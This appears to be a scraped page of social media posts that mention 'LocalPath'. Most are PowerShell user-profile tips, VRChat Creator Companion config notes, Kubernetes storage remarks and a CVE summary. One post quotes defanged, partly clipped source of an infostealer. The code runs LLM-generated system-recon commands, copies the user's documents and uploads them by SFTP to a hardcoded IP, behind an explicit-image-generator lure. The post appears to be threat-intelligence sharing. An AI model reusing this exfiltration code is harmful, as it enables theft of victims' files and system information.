Filter
Exclude
Time range
-
Near
Most "business ideas" die at the strategy doc stage. LocalPath skips that part and builds the actual plan — 90 days, startup budget, first customer. Local service businesses. localpath.polsia.app

9
The hardest part of starting a $20K/month business isn't the work. It's picking the right business. LocalPath builds your 90-day plan. localpath.polsia.app

6
Need the path to the user profile for the system account? (Get-CimInstance -ClassName win32_userprofile -filter "sid = 'S-1-5-18'").LocalPath Profiles for other special accounts also available that way
8
23
1,170
Here I clipped imports/hf tokens/defanged urls def ssh_send(path): address = '144[.]126.202.227' port = 22 username = 'upstage' password = 'upstage' target_path = '/tmp/upl/' client = paramiko[.]SSHClient() client[.]set_missing_host_key_policy(paramiko[.]AutoAddPolicy()) try: client[.]connect(address, port, username, password) sftp = client[.]open_sftp() timestr = time[.]strftime('%Y%m%d-%H%M%S') sftp[.]mkdir(target_path timestr) target_path = '/tmp/upl/' timestr '/' for root, dirs, files in os[.]walk(path): for name in files: remotepath = target_path name localpath = os.path[.]join(root, name) sftp[.]stat(remotepath) remotepath = target_path timestr '_' name sftp[.]put(localpath[.]encode('utf-8'), remotepath[.]encode('utf-8')) finally: pass except IOError: None sftp[.]put(localpath, remotepath) sftp[.]close() client[.]close() return 1 except paramiko[.]SSHException: return 0 def token_error(response): errors = [ 'credits', 'credentials', 'permissions'] for error in errors: result_check = re[.]search(error, response) while not result_check: def query_text(prompt): LLM_API_URL = 'hXXps://router.huggingface[.]co/hyperbolic/v1/chat/completions' for token in tokens_list: authorization_string = 'Bearer ' token headers = { 'Authorization': authorization_string } response = requests[.]post(LLM_API_URL, headers = headers, json = prompt) if response[.]status_code == 200: result = response[.]json() query_result = result['choices'][0]['message']['content'] return query_result def LLM_QUERY_EX(): prompt = { 'messages': [ { 'role': 'Windows systems administrator', 'content': 'Make a list of commands to create folder C:\\Programdata\\info and to gather computer information, hardware information, process and services information, networks information, AD domain information, to execute in one line and add each result to text file c:\\Programdata\\info\\info[.]txt. Return only commands, without markdown' }], 'temperature': 0.1, 'top_p': 0.1, 'model': 'Qwen/Qwen2.5-Coder-32B-Instruct' } llm_query = query_text(prompt) theproc = subprocess[.]run(llm_query, shell = True, stdout = subprocess[.]PIPE, stderr = subprocess[.]STDOUT) 'content': 'Make a list of commands to copy recursively different office and pdf/txt documents in user Documents,Downloads and Desktop folders to a folder c:\\Programdata\\info\\ to execute in one line. Return only command, without markdown.' }], ssh_send('c:\\Programdata\\info\\') def query_image(API_URL, payload): response = requests[.]post(API_URL, headers = headers, json = payload) image_json = response[.]json() image_data = image_json['data'][0]['b64_json'] image = Image[.]open(io[.]BytesIO(base64.b64decode(image_data))) filename = 'image_generated_at_' timestr '.png' image[.]save(filename) print('image saved as ' filename ' in current directory') print('________________________________________________________________________________________________________') print('Enter another prompt to generate new image, or type "exit" to exit program') os[.]system(filename) print('No valid authorization tokens found, program will close now') return None def main(): Image_API_URL = 'hXXps://router.huggingface[.]co/nebius/v1/images/generations' llm_query_thread = Thread(target = LLM_QUERY_EX) print() print('Enter prompt to generate image, for example:') print('"Curvy naked woman sitting, long beautiful legs, front view, full body view, visible face, visible tits".') print('Be as specific in your prompt as possible.') print('Prompts can be typed using any language, but english will return best results') print('To use this example prompt, press "ENTER"') ping_URL = 'hXXps://webhook[.]site/b3e30c61-c8a3-4a8f-9489-5b862585a9a7' ping_time = { 'time_run': time[.]strftime('%Y%m%d-%H%M%S') } requests[.]post(ping_URL, json = ping_time) print('To exit, enter llm_query_thread[.]start() if not input(): cmd = str('Curvy naked woman sitting, long beautiful legs, front view, full body view, visible face, visible tits') if cmd == 'exit': print('What should not be on the image,') print('Default: "missing fingers, deformed fingers, mutated hands, deformed nipples, bad body,extra limbs, extra digit, bad hands, bad fingers, extra fingers,bad proportions, more than 2 nipples"') print('Press "ENTER" to use default') negative_prompt = str('missing fingers, deformed fingers, mutated hands, deformed nipples, bad body,extra limbs, extra digit, bad hands, bad fingers, extra fingers,bad proportions, more than 2 nipples') image_thread = Thread(target = query_image, args = (Image_API_URL, { 'response_format': 'b64_json', 'prompt': cmd, 'negative_prompt': negative_prompt, 'model': 'black-forest-labs/flux-dev' })) print('generating image with prompt: ' cmd) print('image generation can take up to 3-5 minutes, please be patient') image_thread[.]start() main()
3
6
1,519
There must be a nicer way than this... maybe..... # Get Profile Info Get-WmiObject -Class Win32_UserProfile | Where-Object{$_.LocalPath -like “*USERNAME*”} | Select-Object LocalPath, Loaded, Special, SID # Remove Profile $profiles = Get-WmiObject -Class Win32_UserProfile | Where-Object{$_.LocalPath -like “*USERNAME*” -and -not $_.Special -and -not $_.Loaded}; foreach ($profile in $profiles) {try {$profile.Delete(); Write-Host "Profile $($profile.LocalPath) has been deleted."} catch {Write-Host "Failed to delete profile $($profile.LocalPath): $_"}}
5
11
3,392
5 Dec 2024
Last day of #MENOG24! Ask the experts, grab a probe, and put your country on the #RIPEAtlas #network map. Let’s grow the Internet together! #measurement #latency #traceroute #localpath #ambassador @ripencc
This tweet is unavailable
3
4
268
#VRChatCreatorCompanion更新#VRChat Creator Companionがv2.4.0へ更新されました。 =新機能= *複数のフォルダを選択して一括してプロジェクトをVCCに追加出来るように実装 =変更= *Reposフォルダ内のキャッシュファイルにidを利用するように仕様変更 >listingにidが指定されている場合は、<id>-<UUID最初の八文字>.json形式 >listingにidが指定されていない場合は、<uuid>.json (主にListingがとても古い場合) >新しいファイル名形式には自動へ変更・置き換えを実施 *VCCとVCC CLIにおいて.Net6ではなく.Net8を利用するように変更 >.Net6のサポート切れ起因 >.Net8がインストールされていない場合は各自でDL >MacOS・VCC CLI環境では既存のPathをそのまま利用 ($HOME/.local/share/VRChatCreatorCompanion) >Community Reposistoryにおいてapi.github.comのRequest Headerを利用する場合の処理を高速化 (Accept/Authorisationヘッダーは入力済みへ変更・Tokenのみ追加形式へ / 見えているヘッダーは全て自動で追加され毎回Addを押さないでいいように変更) =バグ修正= *VCCにおいて既定のポートが利用出来ない場合に何回か他のポートの利用の可否をトライするように修正 *中身のないProject Manifestが存在する場合にProject Listの読込に失敗するバグを修正 *破損した設定ファイルにおいてCopy Logsボタンが死懐奘に動作しないバグを修正 *VCC CLIにおいて、Unityバージョンの取得に失敗した場合にクラッシュするバグを修正 *Pathが不適切か存在しない場合にuserReposで利用するsettings.jsonのlocalPathの設定値を更新するように修正
17
28
2,799
12 Jul 2024
#PowerShell to give most recently used local profiles for non-local users via WMI/CIM gcim win32_userprofile|? special -eq $false |sort LastUseTime -desc|select @{n='user';e={$script:user = ([System.Security.Principal.SecurityIdentifier]($_.sid)).Translate([System.Security.Principal.NTAccount]).Value;$script:user}},lastusetime,loaded,localpath|where user -notmatch "^$($env:COMPUTERNAME)\\"
12 Jul 2024
If using the UserName property of WMI/CIM Win32_OperatingSystem to get the "user" of a Win10/11 machine, be aware it isn't always populated. Am reviewing some code & presumably is meant to work even if user not currently logged on. Also, should use Get-CIMInstance rather than Get-WMIObject
1
4
12
1,824
解決したsetting.jsonの { "localPath": "C:\\Users\\~.json", "url": "vpm.nadena.dev/vpm.json", "name": "bd_", "id": "vpm.nadena.dev/vpm.json", "headers": {} }, 消したら治った

3
103
12 Jan 2024
Also do not assume that a user's profile will be in a folder the same as their username as stuck profiles & other things may prevent that. Use the registry or win32_userprofile CIM/WMI class gcim win32_userprofile|select SID,@{n='User';e={([System.Security.Principal.SecurityIdentifier]($_.sid)).Translate([System.Security.Principal.NTAccount]).Value}},Loaded,LastUseTime,LocalPath
1
6
675
medium.com/frontend-developm… NPM Modüllerini Local Ortamda Geliştirip Projelerinizde Kullanmak için NPM Link Alternatifi LocalPath kullanımı #npm #link #local #modules

8
699
22 Jan 2023
何ね (VRChatCreatorCompanion/settings.jsonいじってて、userRepos[].localPathを指定し忘れた) (こうはならんでしょ)
4
624
8 Jan 2023
userReposに独自のリポジトリを追加する時はlocalPathも設定してあげないとリポジトリの情報取得を行う度にキャッシュファイルが生成されてVCCが死ぬという事がわかった
1
1
5
248
27 Dec 2021
CVE-2020-20948 An arbitrary file download vulnerability in jeecg v3.8 allows attackers to access sensitive files via modification of the "localPath" variable. cve.mitre.org/cgi-bin/cvenam…

1
11 Sep 2021
powershell -c " $a=\"Windows Registry Editor Version 5.00`n\"; $(Get-SmbMapping).LocalPath -match \"\w\" -replace \":\",\"\"|%% { $a =\"[HKEY_CURRENT_USER\Network\$_]`n\" ;$a =\"`\"ProviderFlags`\"=dword:00000001`n\"};$a>NetDriveBugFix.reg" という.bat作って配った
1
A solução é um EDI em um cluster de eks com database em Oracle e backend de storage em EFS/S3/Lustre/LocalPath para arquivos temporários. O cluster tem que ser 100% privado, inclusive o APIServer e tudo deve entrar através um appliance de firewall na AWS e/ou direto do cliente.
1
2
Replying to @st00nsa
В теории, я никаких. k3s это дистрибутив «с батарейками»: свой LB, ingress — traeffic, pv-class — localpath, CNI — flannel пр. Батарейки можно поменять (у меня дома metallb, openebs, nginx-ingress в k3s-кластере, просто чтобы разобраться). История с SQL вместо Etcd немного мутная
2
2
#kubernetes #external #csi localpath #helm chart that allows usage of VolumeSnapshotter. This is compatible with #microk8s on #raspberrypi github.com/speedwing/csi-hos… feedback and improvements are welcome.

1
2
Resubmit Axion to Valve. It looks like steamcmd no longer accepts full paths for the LocalPath setting now :( Removed partial controller support in the Steam page and removed the "offending" links. Oh, and they objected to some black screens as well #steamworks #steamsdk
1
1
まずいなー、今度はDOTween Pathで詰まってる😅 InstantiateしたオブジェクトをLocalPathで動かそうとするんだけど、そのオブジェクトにとっては通常のPathになっちゃってるみたい。 何かの子としてInstantiateする方法を試してみようかな。 #駆け出しエンジニアと繋がりたい
7